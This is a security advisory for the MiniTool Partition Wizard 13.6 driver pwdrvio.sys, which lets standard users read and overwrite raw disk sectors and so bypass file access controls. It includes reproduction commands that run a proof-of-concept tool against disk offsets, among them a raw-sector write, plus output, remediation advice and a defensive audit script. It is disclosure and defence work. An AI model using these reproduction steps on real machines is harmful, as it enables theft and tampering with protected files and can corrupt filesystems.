MiniTool Partition Wizard Kernel Driver pwdrvio.sys Arbitrary Read and Write

MiniTool Partition Wizard Kernel Driver Allows Standard Users to Read and Write Raw Disk Sectors

Summary

MiniTool Partition Wizard DEMO 13.6 installs the signed kernel driver pwdrvio.sys. The driver exposes \\.\PartitionWizardDiskAccesser\<disk_number> and forwards read, write, and disk IOCTL requests to the lower disk device from kernel context.

In the validation below, a standard user at Medium Integrity could not directly read or write a protected file on a temporary VHD and could not directly open \\.\PhysicalDrive1. The same standard user used pwdrvio.sys to read the protected file's NTFS data clusters from the raw disk and then overwrite those clusters. After remounting the VHD, the protected file contained the low-user supplied marker.

Affected Product and Version

  • Product: MiniTool Partition Wizard DEMO
  • Tested version: 13.6
  • Driver: pwdrvio.sys
  • Driver SHA-256: 0489B3DEC6A33E50D8A48A8DAD3F5B923A81F7300E4A71358D90D2879BAC9AA2

Download URL and SHA-256

  • Download page: https://www.partitionwizard.com/download.html
  • Download URL: https://cdn2.minitool.com/?e=pw-demo&p=pw
  • File name used for validation: pw_demo_installer.exe
  • Installer SHA-256: DBF366FEDD9773D2B336A11180AA00CAFF0F066EF17061C022ACEDBC3548B0FB
  • Installer version: 13.6
  • Installer signature: Valid, MiniTool Software Limited
  • Driver signature: Valid, MiniTool Solution Ltd

Vulnerability Type

Local privilege escalation primitive / raw disk read-write access-control bypass through a kernel driver.

Impact

A low-privileged local user can bypass Windows file and raw-disk access controls by reading and writing raw disk sectors through pwdrvio.sys. This can expose protected file content and can modify protected files by writing their underlying NTFS data clusters.

The proof of concept used a temporary VHD and a self-created protected marker file. The same primitive could be used against sensitive files or filesystem metadata on real disks if the vulnerable driver is installed and reachable.

Test Environment

  • OS: Windows x64 test VM
  • Administrator account used only for installation, VHD setup, and cleanup
  • Test user: standard user EXPDEV\low
  • Test user integrity: Medium Integrity
  • Test user groups: BUILTIN\Users, not BUILTIN\Administrators
  • Controlled disk: temporary VHD attached as disk 1
  • Protected test object: R:\protected\admin_only_flag.bin

Driver Load / Setup Steps

The official MiniTool Partition Wizard DEMO 13.6 installer was downloaded from the vendor CDN and verified. It was installed silently:

pw_demo_installer.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-

The installer created and started the pwdrvio kernel service:

SERVICE_NAME: pwdrvio
TYPE               : 1  KERNEL_DRIVER
STATE              : 4  RUNNING
BINARY_PATH_NAME   : \SystemRoot\system32\pwdrvio.sys

A temporary VHD was created, formatted NTFS, and assigned drive letter R:. An administrator created a protected marker file on that VHD and removed inheritance so only Administrators and SYSTEM had access:

New-Item -ItemType Directory R:\protected
# $markerBytes holds the protected marker bytes prepared beforehand (the string recovered in the read step below)
[IO.File]::WriteAllBytes('R:\protected\admin_only_flag.bin', $markerBytes)
icacls R:\protected\admin_only_flag.bin /inheritance:r /grant:r 'Administrators:F' 'SYSTEM:F'

The file's NTFS extent was resolved with fsutil file queryextents. The first data run began at disk offset 5865472 and was 20480 bytes long on disk 1.

Reproduction Steps

Run the baseline as the standard user:

whoami /all
[IO.File]::ReadAllBytes('R:\protected\admin_only_flag.bin')
[IO.File]::WriteAllText('R:\protected\admin_only_flag.bin', 'SHOULD-NOT-WRITE')
[IO.File]::Open('\\.\PhysicalDrive1', [IO.FileMode]::Open, [IO.FileAccess]::ReadWrite, [IO.FileShare]::ReadWrite)

Observed:

expdev\low
BUILTIN\Users
Mandatory Label\Medium Mandatory Level
READ-FAILED: Access to the path 'R:\protected\admin_only_flag.bin' is denied.
WRITE-FAILED: Access to the path 'R:\protected\admin_only_flag.bin' is denied.
RAW-OPEN-FAILED: Access to the path '\\.\PhysicalDrive1' is denied.

Read the protected file's raw data clusters through the driver as the same standard user:

minitool_pwdrvio_disk_forwarder_poc.exe --disk 1 --read --offset 5865472 --length 20480 --out exploit_read_clusters.bin

Observed:

read 20480 bytes from disk 1 offset 5865472 via pwdrvio forwarder
0000  4d 49 4e 49 54 4f 4f 4c 2d 50 57 44 52 56 49 4f
0010  2d 50 52 4f 54 45 43 54 45 44 2d 46 4c 41 47 2d

The extracted cluster data contained:

MINITOOL-PWDRVIO-PROTECTED-FLAG-cb09e8c5-5583-4bfd-b7db-75d54699bb4f

Dismount the VHD volume, then overwrite only the same controlled file data run as the standard user:

mountvol R: /p
minitool_pwdrvio_disk_forwarder_poc.exe --disk 1 --write --offset 5865472 --in controlled_write_payload.bin --dangerous-write

Observed:

wrote 20480 bytes to disk 1 offset 5865472 via pwdrvio forwarder

Reassign the VHD drive letter and read the protected file as administrator. The file now contains:

MINITOOL-PWDRVIO-WRITE-FLAG-1bb2fd73-db86-41b4-9ffa-83ec90f89d24

Baseline Evidence

  • baseline_direct_access.txt shows the test user is EXPDEV\low, belongs to BUILTIN\Users, and runs at Medium Integrity.
  • The same baseline shows direct read and direct write access to the protected marker file failed with access denied.
  • The same baseline shows direct read-write open of \\.\PhysicalDrive1 failed with access denied.

Exploit Evidence

  • exploit_geometry.txt shows a disk geometry IOCTL succeeded through \\.\PartitionWizardDiskAccesser\1.
  • exploit_read_stdout.txt shows the standard user read 20480 bytes from disk 1 offset 5865472 through pwdrvio.sys.
  • exploit_read_marker.json confirms the raw data contained the protected marker string.
  • exploit_write_stdout.txt shows the standard user wrote 20480 bytes to the same disk offset through pwdrvio.sys.
  • admin_flag_after_write.json confirms the protected file contained the new write marker after remount.

Why This Proves the Vulnerability

The test user is a standard user at Medium Integrity. Windows correctly denied that user direct file access and direct raw-disk access. The same user could access the protected file contents and overwrite them through pwdrvio.sys, because the driver exposes raw disk reads and writes without enforcing the caller's normal Windows access checks.

This demonstrates a practical protected-file read/write impact using a controlled VHD and a self-created protected flag file.

Cleanup Steps

Dismount-DiskImage -ImagePath C:\ProgramData\VendorRepro\minitool_pwdrvio\controlled_disk.vhd
C:\Program\unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART
sc.exe stop pwdrvio
sc.exe delete pwdrvio
sc.exe delete pwdspio
Remove-Item C:\ProgramData\VendorRepro\minitool_pwdrvio -Recurse -Force

Cleanup was confirmed: the VHD was dismounted, the product uninstaller exited successfully, pwdrvio was deleted, and the runtime test directory no longer existed.

Suggested Remediation

  • Do not expose raw disk read/write forwarding to low-privileged callers.
  • Restrict the device object ACL with IoCreateDeviceSecure or an INF SDDL so only trusted administrative service components can open the device.
  • Impersonate the caller and require normal Windows access checks before opening or forwarding operations to disk devices.
  • Remove generic disk IOCTL forwarding or replace it with a strict allowlist of non-sensitive operations.
  • Add explicit authorization checks for all write-capable and raw-disk-capable IOCTL/read/write paths.
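As an added example (not part of this advisory and not vendor code), the PowerShell script below does two things a defender reviewing this report would want: it checks an endpoint for the vulnerable driver using the service name, path and SHA-256 given above, and, for the device-ACL remediation bullet, it decodes the SDDL a fixed driver would pass to IoCreateDeviceSecure so reviewers can see that standard users receive no access. The function names, the choice of the WDK's SDDL_DEVOBJ_SYS_ALL_ADM_ALL string, and the device-open probe (which mirrors the advisory's own baseline check against \\.\PhysicalDrive1) are this example's assumptions; run the presence check elevated and the probe as a standard user.

```powershell
# Added audit script; not part of the advisory and not vendor code.
# Assumptions: service name, driver path and hash are taken from the advisory
# above; run the presence check elevated and the open probe as a standard user.

$DriverName     = 'pwdrvio'
$DriverPath     = Join-Path $env:SystemRoot 'System32\pwdrvio.sys'
# SHA-256 of the 13.6 driver as listed under "Affected Product and Version".
$AdvisorySha256 = '0489B3DEC6A33E50D8A48A8DAD3F5B923A81F7300E4A71358D90D2879BAC9AA2'

function Test-PwdrvioPresent {
    # Kernel driver services are not returned by Get-Service, so query
    # Win32_SystemDriver instead, then compare the on-disk file hash.
    $drv = Get-CimInstance -ClassName Win32_SystemDriver -Filter "Name='$DriverName'" -ErrorAction SilentlyContinue
    $report = [ordered]@{
        ServicePresent = [bool]$drv
        ServiceState   = if ($drv) { $drv.State } else { 'absent' }
        DriverOnDisk   = Test-Path -LiteralPath $DriverPath
        HashMatches    = $false
    }
    if ($report.DriverOnDisk) {
        $hash = (Get-FileHash -LiteralPath $DriverPath -Algorithm SHA256).Hash
        $report.HashMatches = ($hash -ieq $AdvisorySha256)
    }
    [pscustomobject]$report
}

# Device-object security the remediation calls for: SYSTEM and the local
# Administrators group get full access and no other principal gets an ACE,
# so a Medium Integrity user's CreateFile on the device is denied by the
# object manager before the driver ever sees the request. This is the WDK's
# SDDL_DEVOBJ_SYS_ALL_ADM_ALL string, usable with IoCreateDeviceSecure or as
# the INF-supplied device security descriptor (an assumption of this example).
$RecommendedDeviceSddl = 'D:P(A;;GA;;;SY)(A;;GA;;;BA)'

function Show-RecommendedDeviceAcl {
    # Renders the SDDL as readable ACEs so a reviewer can confirm that
    # BUILTIN\Users (the test user's group) is not granted anything.
    (ConvertFrom-SddlString -Sddl $RecommendedDeviceSddl).DiscretionaryAcl
}

function Test-DeviceOpen {
    param([string]$DevicePath = '\\.\PartitionWizardDiskAccesser\1')
    # Same style of probe the advisory's baseline used against
    # \\.\PhysicalDrive1. Run as a standard user: "access-denied" is the
    # expected result once a device ACL like the one above is in place.
    try {
        $h = [IO.File]::Open($DevicePath, [IO.FileMode]::Open,
                             [IO.FileAccess]::ReadWrite, [IO.FileShare]::ReadWrite)
        $h.Dispose()
        return 'open-succeeded'
    } catch [UnauthorizedAccessException] {
        return 'access-denied'
    } catch {
        return "not-opened: $($_.Exception.GetType().Name)"
    }
}

Test-PwdrvioPresent | Format-List
Show-RecommendedDeviceAcl
"Device open as $env:USERNAME -> $(Test-DeviceOpen)"
```

A HashMatches result of True with ServiceState Running means the exact driver build validated in this advisory is loaded; a result of open-succeeded from a non-administrator account confirms the device object is still reachable by standard users and the ACL remediation has not been applied.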